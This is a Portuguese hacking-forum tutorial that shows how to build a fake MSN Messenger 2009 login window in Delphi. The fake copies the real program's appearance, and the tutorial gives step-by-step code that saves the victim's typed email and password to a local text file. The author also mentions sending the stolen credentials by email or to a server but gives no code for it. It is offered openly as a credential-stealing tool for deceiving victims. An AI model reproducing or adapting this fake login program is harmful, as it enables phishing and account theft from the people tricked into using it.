seja bem vindo ao forum eof, caso nao seja cadastrado se cadastre para poder visualizar todo o conteudo ^^

Você não está conectado. Conecte-se ou registre-se

 » Engenharia Social » Tutorial / Dicas / Videos » [tutorial] soft fake basico

[tutorial] soft fake basico

Ver o tópico anterior Ver o tópico seguinte Ir em baixo  Mensagem [Página 1 de 1]

1 [tutorial] soft fake basico em Sex Jan 11, 2013 12:17 pm

Kodo no Kami

avatar
master
master
bom galera nesse tutorial vou ensinar como criar um software fake ele vai ser parecido com original so q vai capturar e armazenar a senha da vitima (no caso vc poderia fazer ele enviar via email ou mandar para um servidor so q eu nao vou ensinar isso nao), entao vamos la o programa fake q eu vou criar vai ser o msn 2009 veja um print dele (esse e o verdadeiro)

[Você precisa estar registrado e conectado para ver esta imagem.]

com print do programa em maos agente recorta apenas a imagem do programa e salva

[Você precisa estar registrado e conectado para ver esta imagem.]

ate aq foi a parte facil agora vem a parte chata abra o delphi nele, deixe o form um pouco maior q o msn por causa da aba de titulo q agente vai remover

[Você precisa estar registrado e conectado para ver esta imagem.]

coloque um componete image da aba Additional na propriedade dele coloque em align alClient e stretch coloque true, depois em picture localize a imagem do msn e coloque ela,

[Você precisa estar registrado e conectado para ver esta imagem.]

como esse tutorial e basico nao vou me focar muito nos detalhes, recorte o x da parte q fecha o msn e coloque outro componete image nele carregue a imagem do x e coloque na posiçao certa em cima da imagem(isso pq agente vai usar a imagem do x para funcionar como se fosse um botao)

[Você precisa estar registrado e conectado para ver esta imagem.]

depois de dois clicks na imagem do x e digite a funçao close;

Código:
procedure TForm1.Image2Click(Sender: TObject);
begin
  close;
end;

agora na propriedade do form vc procura BorderStyle e muda ele para bsNone, agora colocamos um componente ComboBox da aba Standard em cima da onde digitamos email e um edit em cima da onde digitamos a senha (para aparecer * quando digita coloque * na propriedade PasswordChar) nao se esqueça de apagar o Text

[Você precisa estar registrado e conectado para ver esta imagem.]

agora vamos fazer a ultima parte nas imagens (ultima no tutorial mais se vc quiser q fique maneiro recomendo mudar tudo no fake), crie mais um componente image agora vai ser para o botao Entrar

[Você precisa estar registrado e conectado para ver esta imagem.]

agora vamos para parte dos codigos *-* , de dois clicks na imagem do entrar la dentro agente cria uma variavel do tipo textfile

Código:
procedure TForm1.Image3Click(Sender: TObject);
var arq : TextFile;
begin

end;

agora usamos a codiçao if dentro dela usamos not e a funçao fileexists nessa funçao passamos o nome do arquivo de texto q vai salvar, depois dentro de um bloco begin e end colocamos a funçao filecreate passando como argumento o nome do arquivo de texto

Código:
procedure TForm1.Image3Click(Sender: TObject);
var arq : TextFile;
begin
  if(not FileExists('fts.txt')) then
  begin
      FileCreate('fts.txt');
  end;
end;

usamos a funçao assignfile e passamos como argumento a variavel textfile e nome do arquivo de texto

Código:
procedure TForm1.Image3Click(Sender: TObject);
var arq : TextFile;
begin
  AssignFile(arq,'fts.txt');
end;

depois usamos a funçao reset e append dentro delas passamos como argumento nossa variavel textfile

Código:
procedure TForm1.Image3Click(Sender: TObject);
var arq : TextFile;
begin
  if(not FileExists('fts.txt')) then
  begin
      FileCreate('fts.txt');
  end;
  AssignFile(arq,'fts.txt');
  Reset(arq);
  Append(arq);
end;

explicando o codigo anterior ele vai checar para ver ser existe o arquivo de texto caso nao existe ele cria o arquivo e depois abre com permiçao de escrita concatenando ele, agora usamos a funçao writeln passamos como argumento a variavel textfile depois a string 'email: ' + pchar(ComboBox1.Text)

Código:
procedure TForm1.Image3Click(Sender: TObject);
var arq : TextFile;
    fts : string;
begin
  if(not FileExists('fts.txt')) then
  begin
      FileCreate('fts.txt');
  end;
  AssignFile(arq,'fts.txt');
  Reset(arq);
  Append(arq);
  writeln(arq,'email: ' + pchar(ComboBox1.Text));
end;

e por fim usamos writeln denovo mais agora salvamos 'senha: ' + pchar(edit1.text), e fechamos o arquivo com closefile passamos como argumento a variavel textfile

Código:
procedure TForm1.Image3Click(Sender: TObject);
var arq : TextFile;
    fts : string;
begin
  if(not FileExists('fts.txt')) then
  begin
      FileCreate('fts.txt');
  end;
  AssignFile(arq,'fts.txt');
  Reset(arq);
  Append(arq);
  writeln(arq,'email: ' + pchar(ComboBox1.Text));
  writeln(arq,'senha: ' + pchar(Edit1.Text));
  CloseFile(arq);
end;

bom galera meu programa fico meio ruim na imataçao mais se vcs fizer direito copiando cada parte certo fica show *-*

imagem final do programa fake do msn ^^

[Você precisa estar registrado e conectado para ver esta imagem.]

by hacker fts315


_________________ASSINATURA_________________
[Você precisa estar registrado e conectado para ver esta imagem.]
[Você precisa estar registrado e conectado para ver esta imagem.]

Contato:
Spoiler:

Contato:
Facebook: [Você precisa estar registrado e conectado para ver este link.]
Skype: hackerfts315
http://endoffile.umforum.net

Ver o tópico anterior Ver o tópico seguinte Voltar ao Topo  Mensagem [Página 1 de 1]

Permissão deste fórum:
Você não pode responder aos tópicos neste fórum